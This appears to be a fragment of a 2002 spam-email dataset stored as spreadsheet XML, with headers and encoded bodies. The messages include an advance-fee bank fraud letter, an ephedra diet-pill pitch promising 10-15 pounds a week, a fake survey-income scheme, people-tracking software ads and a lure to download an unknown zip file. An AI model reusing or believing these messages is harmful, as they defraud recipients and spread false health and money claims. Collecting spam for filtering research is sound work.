2=3C=2FA=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3C=2FB=3E=A1=A1=3CFONT color=3D#0000a0 face=3DArial \n      size=3D3=3E=3CSTRONG=3EIf&amp;nbsp=3B you can not download this program =2C&amp;nbsp=3B please   \n      copy the following link into your URL =2C and then click =22 Enter=22 on your   \n      Computer Keyboard=2E=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  \n      =3CP=3E=3CFONT size=3D2=3E=3CFONT color=3D#0000a0 face=3DArial size=3D3=3E=3CSTRONG=3EHere is the   \n      download links=3A=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  \n      =3CDIV=3E  \n      =3CP=3Ehttp=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=3C=2FP=3E  \n      =3CP=3Ehttp=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=3C=2FP=3E=3C=2FFONT=3E=3C=2FDIV=3E  \n      =3CP=3E=3C=2FP=3E=3C=2FTD=3E  \n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E  \n  =3CTR=3E  \n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E  \n    =3CTD bgColor=3D#0f95de width=3D=2290%=22=3E=3CFONT color=3D#ffffff   \n      face=3D=22Verdana=2C Tahoma=2C Helvetica=2C SansSerif=22   \n      size=3D1=3E=3CB=3EDisclaimer=3A=3C=2FB=3E=3CBR=3EWe are strongly against continuously sending   \n      unsolicited emails to those who do not wish to receive our special   \n      mailings=2E We have attained the services of an independent 3rd party to   \n      overlook list management and removal services=2E This is not unsolicited   \n      email=2E If you do not wish to receive further mailings=2C please click this   \n      link =3CA href=3D=22 mailto=3Aremoval=40btamail=2Enet=2Ecn =22   \n      target=3D=5Fblank=3E=3CFONT   \n      color=3D#fdd32a=3E=3CB=3Emailto=3Aremoval=40btamail=2Enet=2Ecn  \n      =3C=2FB=3E=3C=2FFONT=3E=3C=2FA=3E=2E&amp;nbsp=3B=3C=2FFONT=3E=3CB=3E=3CFONT class=3Ddisclaimer color=3D#000080  \n      face=3DArial=3E=3CBR=3EThis message is a commercial advertisement=2E It is compliant  \n      with all federal and state laws regarding email messages including the  \n      California Business and Professions Code=2E We have provided the subject  \n      line =22ADV=22 to provide you notification that this is a commercial  \n      advertisement for persons over 18yrs old=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FTD=3E \n    =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E \n=3CBR=3E\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462</t>
  </si>
  <si>
    <t>To: jpbreda@msn.com, alomia26@yahoo.com, cypherpunks@einstein.ssz.com\nFrom: dackel@hotmail.com\nDate: Wed, 24 Jul 2002 05:24:05 -1600</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 05:24:05 -1600</t>
  </si>
  <si>
    <t>dackel@hotmail.com</t>
  </si>
  <si>
    <t>jpbreda@msn.com, alomia26@yahoo.com, cypherpunks@einstein.ssz.com</t>
  </si>
  <si>
    <t>Lose 28 Pounds In 10 Days                     30201</t>
  </si>
  <si>
    <t>Long time no chat!\n\nHow have you been? If you've been like me, you've been trying\ntrying almost EVERYTHING to lose weight.=A0 I know how you feel\n- the special diets, miracle pills, and fancy exercise=20\nequipment never helped me lose the pounds I needed to lose\neither.=A0 It seemed like the harder I worked at it, the less\nweight I lost - until I heard about 'Extreme Power Plus'.\n\nYou're probably thinking to yourself, "Oh geez, not another\nmiracle diet pill!"=A0 Like you, I was skeptical at first, but=20\nmy sister said it helped her lose 23 pounds in just 2 weeks,=20\nso I told her I'd give it a try.=A0 I mean, there was nothing=20\nto lose except a lot of weight!=A0 Let me tell you, it was\nthe best decision I've ever made.  PERIOD.  Six months later,\nas I'm writing this message to you, I've gone from 355 pounds\nto 210 pounds, and I haven't changed my exercise routine or diet\nat all.=A0 Yes, I still eat pizza, and lots of it!\n\nI was so happy with the results that I contacted the manufacturer\nand received permission to resell it - at a HUGE discount.=A0I feel\nthe need to help other people lose weight like I did, because it\ndoes so much for your self-esteem, not to mention your health.\nI am giving you my personal pledge that 'Extreme Power Plus'\nabsolutely WILL WORK FOR YOU. 100 % Money-Back GUARANTEED!\n\nIf you are frustrated with trying other products, without having=20\nany success, and just not getting the results you were promised,\nthen I recommend the only product that worked for me -=20\n'EXTREME POWER PLUS'!\n\nYou're probably asking yourself, "Ok, so how does this stuff\nactually work?"\n\nExtreme Power Plus contains Lipotropic fat burners and ephedra which=20\nis scientifically proven to increase metabolism and cause rapid=20\nweight loss. No "hocus pocus" in these pills - just RESULTS!!!=20\n\nHere is the bottom line ...\n\nI can help you lose 10-15 pounds per week naturally, without\nexercising and without having to eat rice cakes all day.=A0=20\nJust try it for one month - there's pounds to lose and confidence=20\nto gain!=A0 You will lose weight fast - GUARANTEED.=A0 This is my\npledge to you.\n\nBONUS! Order NOW &amp; get FREE SHIPPING on 3 bottles or more!=A0=20\n\nTo order Extreme Power Plus on our secure server, just click\non this link -&gt; [URL]http://www.2002dietspecials.com[/URL]\n\nTo see what some of our customers have said about this product,=20\nvisit [URL]http://www.2002dietspecials.com[/URL]\n\nTo see a list of ingredients and for more information\non test studies and how it will help you lose weight, visit=20\n[URL]http://www.2002dietspecials.com[/URL]\n\n**************************************************************\nIf you feel that you have received this email in error, please=20\nsend an email to "print2@btamail.net.cn" requesting to be=20\nremoved. Thank you, and we apologize for any inconvenience.\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www.2002dietspecials.com http://www.2002dietspecials.com http://www.2002dietspecials.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5405</t>
  </si>
  <si>
    <t>To: cypherpunks@einstein.ssz.com\nFrom: &lt;return@snine.com&gt;\nDate: Wed, 24 Jul 2002 03:53:05 +0900</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 03:53:05 +0900</t>
  </si>
  <si>
    <t>&lt;return@snine.com&gt;</t>
  </si>
  <si>
    <t>(){_x0001_!!..x_x0001_  ý</t>
  </si>
  <si>
    <t>PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9u\nYWwvL0VOIj4NCjwhLS0gc2F2ZWQgZnJvbSB1cmw9KDAwNDIpZmlsZTovL1xcUzktZ3Utbm90\nZWJvb2tcdGVtcFxtYXJrZXRpbmcuaHRtIC0tPg0KPEhUTUw+PEhFQUQ+PFRJVExFPsDPud0g\nxMTHu8XNIL/4sMW4riCwqL3DIL3DvbrF2zwvVElUTEU+DQo8TUVUQSBodHRwLWVxdWl2PUNv\nbnRlbnQtVHlwZSBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9a3NfY181NjAxLTE5ODci\nPg0KPE1FVEEgY29udGVudD0iTVNIVE1MIDYuMDAuMjYwMC4wIiBuYW1lPUdFTkVSQVRPUj48\nL0hFQUQ+DQo8Qk9EWSB0ZXh0PWJsYWNrIHZMaW5rPXB1cnBsZSBhTGluaz1yZWQgbGluaz1i\nbHVlIGJnQ29sb3I9d2hpdGU+DQo8VEFCTEUgaGVpZ2h0PTI1IGNlbGxTcGFjaW5nPTAgY2Vs\nbFBhZGRpbmc9MCB3aWR0aD0iODAlIiBhbGlnbj1jZW50ZXINCmJnQ29sb3I9cmVkIGJvcmRl\ncj0wPg0KPFRCT0RZPg0KPFRSPg0KPFREIHdpZHRoPTEwNCBoZWlnaHQ9NTggcm93U3Bhbj0y\nPg0KPFAgYWxpZ249Y2VudGVyPjxBIGhyZWY9Imh0dHA6Ly93d3cuc25pbmUuY29tLyI+PElN\nRyBhbHQ9IiIgaHNwYWNlPTANCnNyYz0iaHR0cDovL3d3dy5zbmluZS5jb20vaW5mb20vczku\nZ2lmIiBib3JkZXI9MD48L0E+PC9QPjwvVEQ+DQo8VEQgd2lkdGg9MTIwIGhlaWdodD04MiBy\nb3dTcGFuPTM+DQo8UD4mbmJzcDs8L1A+PC9URD4NCjxURCB3aWR0aD0zMDIgaGVpZ2h0PTgy\nIHJvd1NwYW49Mz4NCjxQIGFsaWduPWNlbnRlcj48Qj48Rk9OVCBjb2xvcj13aGl0ZT6/+LDF\nuK4gsKi9wyC9w726xds8QlI+tOu4rsGhILnXILX0t68mbmJzcDu48MH9DQq+yLO7PC9GT05U\nPjwvQj4mbmJzcDs8L1A+PC9URD4NCjxURCB2QWxpZ249Ym90dG9tIHdpZHRoPTI2MCBoZWln\naHQ9MjY+DQo8UCBhbGlnbj1yaWdodD48U1BBTiBzdHlsZT0iRk9OVC1TSVpFOiAxNHB0Ij48\nQj48Rk9OVCBjb2xvcj13aGl0ZT5EaWdpdGFsDQpTZWN1cml0eSBTb2x1dGlvbjwvRk9OVD48\nL0I+PC9TUEFOPjwvUD48L1REPjwvVFI+DQo8VFI+DQo8VEQgdkFsaWduPWNlbnRlciB3aWR0\naD0yNjAgaGVpZ2h0PTE5Pg0KPFAgYWxpZ249cmlnaHQ+PEI+PEZPTlQgY29sb3I9d2hpdGU+\nUzkgSW5jLjwvRk9OVD48L0I+PC9QPjwvVEQ+PC9UUj4NCjxUUj4NCjxURCB3aWR0aD0xMDQg\naGVpZ2h0PTI0Pg0KPFA+PEEgaHJlZj0iaHR0cDovL3d3dy5zbmluZS5jb20vIj48SU1HIGhl\naWdodD0xNg0Kc3JjPSJodHRwOi8vd3d3LnNuaW5lLmNvbS9pbmZvbS9zbmluZS5naWYiIHdp\nZHRoPTEwMCBib3JkZXI9MD48L0E+PC9QPjwvVEQ+DQo8VEQgd2lkdGg9MjYwIGhlaWdodD0y\nND4NCjxQPiZuYnNwOzwvUD48L1REPjwvVFI+DQo8VFI+DQo8VEQNCnN0eWxlPSJCT1JERVIt\nTEVGVC1DT0xPUjogcmVkOyBCT1JERVItQk9UVE9NLUNPTE9SOiByZWQ7IEJPUkRFUi1UT1At\nU1RZTEU6IG5vbmU7IEJPUkRFUi1UT1AtQ09MT1I6IHJlZDsgQk9SREVSLVJJR0hULVNUWUxF\nOiBub25lOyBCT1JERVItTEVGVC1TVFlMRTogbm9uZTsgQk9SREVSLVJJR0hULUNPTE9SOiBy\nZWQ7IEJPUkRFUi1CT1RUT00tU1RZTEU6IHNvbGlkIg0KdkFsaWduPWJvdHRvbSB3aWR0aD03\nODYgYmdDb2xvcj13aGl0ZSBjb2xTcGFuPTQgaGVpZ2h0PTQ+DQo8UCBhbGlnbj1jZW50ZXI+\nPEZPTlQNCnNpemU9MT4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz\ncDsmbmJzcDs8L0ZPTlQ+PC9QPjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+DQo8VEFCTEUg\nd2lkdGg9IjgwJSIgYWxpZ249Y2VudGVyIGJvcmRlcj0wPg0KPFRCT0RZPg0KPFRSPg0KPFRE\nIHdpZHRoPTk2NCBoZWlnaHQ9NDU+DQo8UD48Rk9OVCBzaXplPTI+Uzkgv6G8rbTCILzSsdS4\n8CC51yDAz7ndILjFwOW/68C4t84gsLO537XIIL/4sMW4riCwqL3DIL3DvbrF28DHIMCvxesg\nudcgvLPEobimILTjtOfHz73HILrQwLsNCrjwwf3H1bTPtNkuPC9GT05UPjwvUD48L1REPjwv\nVFI+DQo8VFI+DQo8VEQgd2lkdGg9OTY0IGhlaWdodD0zOT4NCjxQPjxGT05UIGNvbG9yPSMw\nMDAwYTA+PFNUUk9ORz69w726xdsgsLO/5DwvU1RST05HPjxCUj48L0ZPTlQ+PEZPTlQNCmNv\nbG9yPSM2NjY2NjYgc2l6ZT0yPjEuILHiwbjAxyBDQ1RWILD4u+fAxyDB1r/kILmuwabBocDO\nILP0wLogsKGw3bTruKYgPFNUUk9ORz7Dt7TcILXwwfbF0A0Kuea9xDwvU1RST05HPsC4t84g\nwPzIr8fUwLi3zrytILzSsdS48CC4xcDlse7B9rW1ILyzxKG6zrTjx9i80i48QlI+Mi4gv/iw\n3cH2v6G8rSA8U1RST05HPsDOxc2z3cC7DQrF68fYPC9TVFJPTkc+ILjFwOXAuyDH17vzIL3H\nvcOwoyC6vCC89rChIMDWwL0uIDxTVFJPTkc+w9a06yAxNrG6taXAxyC4xcDlwLsgtb+9w7+h\nIL/4sN3B9r+hvK0NCrCovcM8L1NUUk9ORz4uPEJSPjMuIL7fsKMgxKfA1MDaILnfu/29wyA8\nU1RST05HPr+5vuDA/MitIDWxurWlt84gwNq1vyDF67q4x8+45yC9x73DsKMgx/bA5bCow7sg\nudcNCsf2wOXF68itPC9TVFJPTkc+sKEgsKG0ycfULjxCUj40LiC18MH2xdC55r3EwLi3ziDI\nrbvzwPrA5cC7IMTEx7vFzb+hIMfUwLi3ziCx4sG4wMcgPFNUUk9ORz5WaWRlbyBUYXBltMIN\nCsfKv+S++MC9PC9TVFJPTkc+LjwvRk9OVD48Rk9OVCBzaXplPTI+PEJSPjwvRk9OVD48L1A+\nPC9URD48L1RSPg0KPFRSPg0KPFREIHdpZHRoPTk2NCBoZWlnaHQ9NDQ+DQo8UD48QlI+PEZP\nTlQgY29sb3I9IzY2NjY2NiBzaXplPTI+v6m3r7/rtbXAxyC4tsTJxsPAzCCwobTJx8+45yC0\n57vnwMcgPC9GT05UPjxCPjxGT05UDQpjb2xvcj0jMzMzMzMzIHNpemU9Mj6/z7qux9EgseK8\n+sH2v/jAuLfOIL+1vve/obi4IMD8s+Q8L0ZPTlQ+PC9CPjxGT05UIGNvbG9yPSM2NjY2NjYN\nCnNpemU9Mj7Hz73HvPYgwNa9wLTPtNkuPC9GT05UPjwvUD4NCjxQPjxGT05UIGNvbG9yPSM2\nNjY2NjY+PEI+wabHsLmuwMc8L0I+IDogUzkgv7W+98bAIDAyLTY4OC04MDg4LjwvRk9OVD4g\nPEENCmhyZWY9Imh0dHA6Ly93d3cuc25pbmUuY29tLyI+aHR0cDovL3d3dy5zbmluZS5jb20v\nPC9BPiZuYnNwOyA8QQ0KaHJlZj0ibWFpbHRvOnNOaW5lQHNOaW5lLmNvbSI+c05pbmVAc05p\nbmUuY29tPC9BPjwvUD48L1REPjwvVFI+DQo8VFI+DQo8VEQgd2lkdGg9OTY0IGhlaWdodD0x\nNDI+DQo8UCBhbGlnbj1jZW50ZXI+PElNRyBzdHlsZT0iV0lEVEg6IDcwNnB4OyBIRUlHSFQ6\nIDE4OHB4IiBoZWlnaHQ9MTU1IGFsdD0iIg0KaHNwYWNlPTAgc3JjPSJodHRwOi8vd3d3LnNu\naW5lLmNvbS9pbmZvbS9jdXN0b21lci5naWYiIHdpZHRoPTc3NiBib3JkZXI9MD48L1A+DQo8\nUCBhbGlnbj1jZW50ZXI+PEENCmhyZWY9Im1haWx0bzpyZWplY3RAc25pbmUuY29tP3N1Ympl\nY3Q9RGVsZXRlIG15IGVtYWlsIEFkZHJlc3MhISEiPjxGT05UDQpjb2xvcj0jNjY2NjY2IHNp\nemU9MT48SU1HIHNyYz0iaHR0cDovL3d3dy5zbmluZS5jb20vaW5mb20vcmVmdXNlLmdpZiIN\nCmJvcmRlcj0wPjwvRk9OVD48L0E+PC9QPg0KPFAgYWxpZ249bGVmdD48Rk9OVCBjb2xvcj0j\nNjY2NjY2IHNpemU9MT66u7jewM/AuiDBpLq4xeu9xbjBIMDMv+vDy8H4ILnXIMGkuri6uMij\nILXuv6EgsPzH0SC5/bf8IMGmDQo1MMG2v6EgwMewxcfRIFuxpLDtXbjewM/A1LTPtNkuPEJS\nPrTnu+e0wiBlbWFpbL/cIL7utrDH0SDBpLq4tbUgsKHB9rDtIMDWwfYgvsq9wLTPtNkuILz2\nvcXAuyC/+MShvsrAu73DILz2vcWwxbrOuKYNCrStt6/B1r3KvcO/5DwvRk9OVD48Rk9OVCBz\naXplPTE+PEENCmhyZWY9Im1haWx0bzpyZWplY3RAc25pbmUuY29tP3N1YmplY3Q9vPa9xbDF\nus4iPjxJTUcgaGVpZ2h0PTIyDQpzcmM9Imh0dHA6Ly93d3cuc25pbmUuY29tL2luZm9tL3Jl\namVjdC5naWYiIHdpZHRoPTgyDQpib3JkZXI9MD48L0E+PC9GT05UPjwvUD48L1REPjwvVFI+\nPC9UQk9EWT48L1RBQkxFPg0KPFA+Jm5ic3A7PC9QPjwvQk9EWT48L0hUTUw+DQo=\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421</t>
  </si>
  <si>
    <t>To: cpunk@lne.com\nFrom: "MR MABO LOKO" &lt;jyyyyl19582000@rediff.com&gt;\nDate: Wed, 24 Jul 2002 03:44:37 +0200</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 03:44:37 +0200</t>
  </si>
  <si>
    <t>"MR MABO LOKO" &lt;jyyyyl19582000@rediff.com&gt;</t>
  </si>
  <si>
    <t>cpunk@lne.com</t>
  </si>
  <si>
    <t>Profitable Business Relationship</t>
  </si>
  <si>
    <t>MR MABO LOKO\nBRANCH OFFICER,\nUNITED BANK FOR AFRICA PLC\nILUPEJU LAGOS NIGERIA\n                               \n                              \nATT:PRESIDENT/C.E.O\n\nSIR                 \n\n          AN URGENT BUSINESS PROPOSAL\nI am pleased to get across to you for a very urgent and profitable \nbusiness proposal,Though I don't know you neither have I seen you before but my confidence was reposed On you when the Chief Executive of Lagos State\nchamber of Commerce and Industry handed me your contact for a \nconfidential business. \n\nI am AN OFFICER with the United Bank for Africa Plc (UBA),Ilupeju branch,\nLagos Nigeria.\n\nThe intended business is thus; We had a customer, a Foreigner (a \nTurkish)resident in Nigeria, he was a Contractor with one of the Government Parastatals. He has in his Account in my branch the sum of US$35 Million(Thirty five Million U.S. Dollars).\n \nUnfortunately, the man died four years ago until today non-of his next\nof kin has come Forward to claim the money. \nHaving noticed this, I in collaboration with two other top Officials\nof the bank we have covered up the account all this while.  \n Now we want you (being a foreigner) to be fronted as one of his next\nof kin and forward Your account and other relevant documents to be \nadvised to you by us to attest to the Claim. \n\nWe will use our positions to get all internal documentations to back\nup the claims .The whole procedures will last only ten working days to\nget the fund retrieved successfully Without trace even in future.\n \nYour response is only what we are waiting for as we have arranged all\nnecessary things  As soon as this message comes to you kindly get back to me indicating your interest ,Then I will furnish you with the whole procedures to ensure that the deal is successfully Concluded \n\nFor your assistance we have agreed to give you thirty percent (30%) of\nthe Total sum at the end of the transaction. It is risk free and a mega\nfortune. \nAll correspondence Towards this transaction will be through the e-mail\naddresses. \n \nI await your earliest response.  \nThanks, \n\nYours Sincerel\n\nMR MABO LOKO\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404</t>
  </si>
  <si>
    <t>To: cpums@sinamail.com\nFrom: anlin002@ms82.url.com.tw\nDate: Wed, 24 Jul 2002 02:44:04 +0800</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 02:44:04 +0800</t>
  </si>
  <si>
    <t>anlin002@ms82.url.com.tw</t>
  </si>
  <si>
    <t>cpums@sinamail.com</t>
  </si>
  <si>
    <t>=?Big5?B?ur+36qfZq/wtMi0xNDgt?=</t>
  </si>
  <si>
    <t>=A1@=20              =B2=A3=AB~=A6W=BA=D9=A1G&lt;= /FONT&gt; =BA=BF=B7=EA=A7=D9=AB=FC  &amp;n= bsp;=20       =A9m=A1@    =A6W=A1G=B6=B7=B6=F1=BCg=A4=A4=A4=E5=A5=FE=A6W=A1A=A4=C5=B6=F1=BC= g=BC=CA=BA=D9   =A6=ED    =A1@=A7}=A1G  &amp;n= bsp;=20       =A6=ED=A6v=B9q=B8=DC=A1G    =A4=BD=A5q=B9q=B8=DC=A1= G    =A6=E6=B0=CA=B9q=B8=DC=A1= G  &amp;n= bsp;=20       =B9q=A4l=B6l=A5=F3=A1G  &amp;n= bsp;=20       =B2=CE=A4@=BDs=B8=B9=A1G &amp;n= bsp; =20       =A7=DA=A7=C6=B1=E6=A6=AC=A8=EC=A7=F3=A6h=AA=BA=A7K=B6O=B0=D3= =AB~=B8=EA=B0T=B9q=A4l=B3=F8  =B3=C6=A1@=A1@=B5=F9=A1G=A5=D3=BD=D0=A4H=A5u=B6=B7=ADt=BE=E1= =AC=A1=B0=CA=C3=D8=AB~=B9B=B6O150=A4=B8=A1A=BD=D0=BDT=B9=EA        =20       =B6=F1=BD=D0=A5=D3=BD=D0=AA=ED=A1A=A6p=B8=EA=AE=C6=A6=B3=BB~=B1N=A4= =A3=B3B=B2z=A1C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425</t>
  </si>
  <si>
    <t>To: cypherpunks@einstein.ssz.com\nFrom: Central_Bank6@centralbank.com\nDate: Wed, 24 Jul 2002 02:42:22</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 02:42:22</t>
  </si>
  <si>
    <t>Central_Bank6@centralbank.com</t>
  </si>
  <si>
    <t>Notification for Payment Received!</t>
  </si>
  <si>
    <t>Notification for Payment Received! 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 					=09 Notification for Payment Received !!!, This email confirms that you may receive $6,000.00 (Commissions) Payment for LAST month for your 1 hours work a day.  TRANSACTION INFORMATION: Amount: $6,000.00 Item/Product Name:  Number of Survey  12/day X 30/days =3D 120 Item/Product Comission:  Average $/Survey  =3D $50 Total: 120 surveys X $50 =3D $6,000 THIS IS A KIND OF EMAIL YOU SHOULD RECEIVED AFTER YOUR FIRST MONTH Could be nice, don't you think ? ***************************************************** Hello! Here is the Greatest Opportunity ever presented on Internet YOU SURF THE WEB ALREADY,  SO WHY NOT GET PAID FOR IT......  There are numerous market research companies  on the web willing to pay you strictly in cold CASH  (Guaranteed $15-$125 and more per survey) for simply giving  your opinions by participating in their surveys! The more you sign up with, the more money you make!  How much you make is up to you.Easy calculation: Let=92s say that you have one hour a day the most  of the survey will take 15 minutes so you can fill out 4 surveys a day. If you take 4 survey at $50 =3D $200 by 30 days =3D $6 000 a month What about now if you spend 3 hours a day? WOW $18 000 a month to stay home  and care about your family The companies are sending you checks  usually 3 to 5 days after you did fill it out. Tell Your Friends About us! We will pay you EVERY DAY for each sale you do! The rewards continue!  Telling your friends  about us is an outstanding business decision...   Not only will we pay you for completing a survey,  But you will get pay for each survey that your friends fill out too!    =20 So don't wait another second join us NOW=20 and have your friends sign up today! ACT NOW AND GET YOUR COMPLIMENTARY=20 3-DAY/2-NIGHT DREAM VACATION  as a special introductory offer! ABSOLUTELY FREE!!! To get all details =20 Push button below. YOU WANT TO BE REMOVED? Push button below to be REMOVED=20 =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435</t>
  </si>
  <si>
    <t>To: ciccio80@aol.com, bugarman1@aol.com\nFrom: "New Product Showcase" &lt;seemsg_8452970@gmx.net&gt;\nDate: Wed, 24 Jul 2002 02:32:34 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 02:32:34 -0700</t>
  </si>
  <si>
    <t>"New Product Showcase" &lt;seemsg_8452970@gmx.net&gt;</t>
  </si>
  <si>
    <t>ciccio80@aol.com, bugarman1@aol.com</t>
  </si>
  <si>
    <t>============================================= Brand-New VERSION 7.0 Just Released: Astounding New Software Lets You Find Out Almost ANYTHING about ANYONE... ============================================= Download it right now (no charge card needed): For the brand-new VERSION 7.0, click here: [URL]http://lv724super.supereva.it[/URL]  Discover EVERYTHING you ever wanted to know about: your friends your family your enemies your employees yourself - Is Someone Using Your Identity? even your boss! DID YOU KNOW you can search for ANYONE, ANYTIME, ANYWHERE, right on the Internet? Download this software right now--click here: [URL]http://lv724super.supereva.it[/URL]  This mammoth COLLECTION of internet investigative tools &amp; research sites will provide you with NEARLY 400 GIGANTIC SEARCH RESOURCES to locate information on: * people you trust * screen new tenants or roommates * housekeepers * current or past employment * people you work with * license plate number with name and address * unlisted phone numbers * long lost friends Locate e-mails, phone numbers, or addresses: o Get a Copy of Your FBI file. o Get a Copy of Your Military file. o FIND DEBTORS and locate HIDDEN ASSETS. o Check CRIMINAL Drug and driving RECORDS. o Lookup someone's EMPLOYMENT history. For the brand-new VERSION 7.0, click here: [URL]http://lv724super.supereva.it[/URL]  Locate old classmates, missing family member, or a LONG LOST LOVE: - Do Background Checks on EMPLOYEES before you   hire them. - Investigate your family history, birth, death   and government records! - Discover how UNLISTED phone numbers are located. - Check out your new or old LOVE INTEREST. - Verify your own CREDIT REPORTS so you can   correct WRONG information. - Track anyone's Internet ACTIVITY; see the sites   they visit, and what they are typing. - Explore SECRET WEB SITES that conventional   search engines have never found. For the brand-new VERSION 7.0, click here: [URL]http://lv724super.supereva.it[/URL]  ==&gt; Discover little-known ways to make UNTRACEABLE     PHONE CALLS. ==&gt; Check ADOPTION records; locate MISSING CHILDREN     or relatives. ==&gt; Dig up information on your FRIENDS, NEIGHBORS,     or BOSS! ==&gt; Discover EMPLOYMENT opportunities from AROUND     THE WORLD! ==&gt; Locate transcripts and COURT ORDERS from all     50 states. ==&gt; CLOAK your EMAIL so your true address can't     be discovered. ==&gt; Find out how much ALIMONY your neighbor is paying. ==&gt; Discover how to check your phones for WIRETAPS. ==&gt; Or check yourself out, and you will be shocked at     what you find!! These are only a few things you can do, There is no limit to the power of this software!! To download this software, and have it in less than 5 minutes click on the url below to visit our website (NEW: No charge card needed!) [URL]http://lv724super.supereva.it[/URL]  If you no longer wish to hear about future offers from us, send us a message with STOP in the subject line, by clicking here: mailto:remv0615a@bk.ru?subject=STOP_GN724  Please allow up to 72 hours to take effect. Please do not include any correspondence in your message to this automatic stop robot--it will not be read. All requests processed automatically.  [:KJ)_8J7BJK9^":}H&amp;*TG0]</t>
  </si>
  <si>
    <t>http://lv724super.supereva.it http://lv724super.supereva.it http://lv724super.supereva.it http://lv724super.supereva.it http://lv724super.supereva.it</t>
  </si>
  <si>
    <t>5458</t>
  </si>
  <si>
    <t>To: &lt;jzlin@ba.no&gt;\nFrom: "Int. Properties" &lt;jzlin@ba.no&gt;\nDate: Wed, 24 Jul 2002 01:14:39 -1900</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 01:14:39 -1900</t>
  </si>
  <si>
    <t>"Int. Properties" &lt;jzlin@ba.no&gt;</t>
  </si>
  <si>
    <t>&lt;jzlin@ba.no&gt;</t>
  </si>
  <si>
    <t>Refinance Your Existing Mortgage</t>
  </si>
  <si>
    <t>**Mortgage Rates Sl= ashed For The Last Time!** * * * **Let us help you get a new mortgage= for up to 100% of your home=FFFFFF92s value** | * Lower your monthly payment!  * Consolidate your debt!  * Shorten the term of your loan!  * Reduce your interest rate!    ---   &lt;= /TABLE&gt; **National Average Mortgage Rates**      **Program** | **Rates**   ---|---   ** 30 Yr Fixed | 6.50%   15 Yr Fixed | 6.25%   1 Yr Arm | 5.51%      Choose From Hu= ndreds of   Loan Programs Like:   ---      ** * Purchase Loans  * Refinance  * Debt Consolidation  * Home Improvement  * Interest Only Jumbo's  * No Income Verification **   ---   &lt;= /TABLE&gt; Fill Out This = Simple Form and We Will Compete For Your Business...   ---      **Required Input Field *** | **Name** * |   ---|---   **Address** |   **City** |   **State** * |   **Zip Code** * |   **Buiness Phone** * |   **Home Phone** |   **Best time to contact** |  Morning Afternoon Evening&lt;= /TR&gt;** | **Total Loan Request** |   **Approx. Home Value** |         A consultant will contact you soon.   ---   **All informa= tion given herein is strictly confidential and will not be re- distributed= for any reason other than for the specific use intended.**   To be removed from our distribution lists, please Click here..   ---      =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436</t>
  </si>
  <si>
    <t>To: &lt;webmaster@efi.ie&gt;\nFrom: &lt;adrian7713j74@chello.at&gt;\nDate: Wed, 24 Jul 0102 21:48:06 +1200</t>
  </si>
  <si>
    <t>Wed, 24 Jul 0102 21:48:06 +1200</t>
  </si>
  <si>
    <t>&lt;adrian7713j74@chello.at&gt;</t>
  </si>
  <si>
    <t>Is your nest egg cracking? 2617iWcH6-263-12</t>
  </si>
  <si>
    <t>On January 1st 2002, the European countries began\nusing the new Euro.  Never before have so\nmany countries with such powerful economies united\nto use a single currency.  Get your piece of history\nnow!  We would like to send you a FREE Euro\nand a FREE report on world currency.  Just visit\nour site to request your Euro and Euro report:\n \n[URL]http://www282.wiildaccess.com[/URL]\n \nIn addition to our currency report, you can receive\nour FREE INVESTMENT PACKAGE:\n \n*Learn how $10,000 in options will leverage $1,000,000 in\nEuro Currency. This means even a small movement in the market\nhas huge profit potential.\n \nIf you are over age 18 and have some risk capital, it's\nimportant that you find out how the Euro will\nchange the economic world and how you can profit!\n \n$10,000 minimum investment\n \nPlease carefully evaluate your financial position before\ntrading.  Only risk capital should be used.\n\n[URL]http://www282.wiildaccess.com[/URL]\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nTo "Opt-Out":\n\n[URL]http://www282.wiildaccess.com[/URL]\n\n0869rJKU9-021Irsi848l19\n \n\n\n4277RtxO1-887Zecb8252kxVB8-521HKCX9386Mbpg6-812PqeJ6560NlfV1-018yhmw1788ZOTh2-726Gl77</t>
  </si>
  <si>
    <t>http://www282.wiildaccess.com http://www282.wiildaccess.com http://www282.wiildaccess.com</t>
  </si>
  <si>
    <t>5440</t>
  </si>
  <si>
    <t>To: Earn.money.online@einstein.ssz.com\nFrom: roberthj1@juno.com\nDate: Wed, 24 Jul 0102 05:30:52 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 0102 05:30:52 -0700</t>
  </si>
  <si>
    <t>roberthj1@juno.com</t>
  </si>
  <si>
    <t>Earn.money.online@einstein.ssz.com</t>
  </si>
  <si>
    <t>Never Pay eBay Fees Again!!!!</t>
  </si>
  <si>
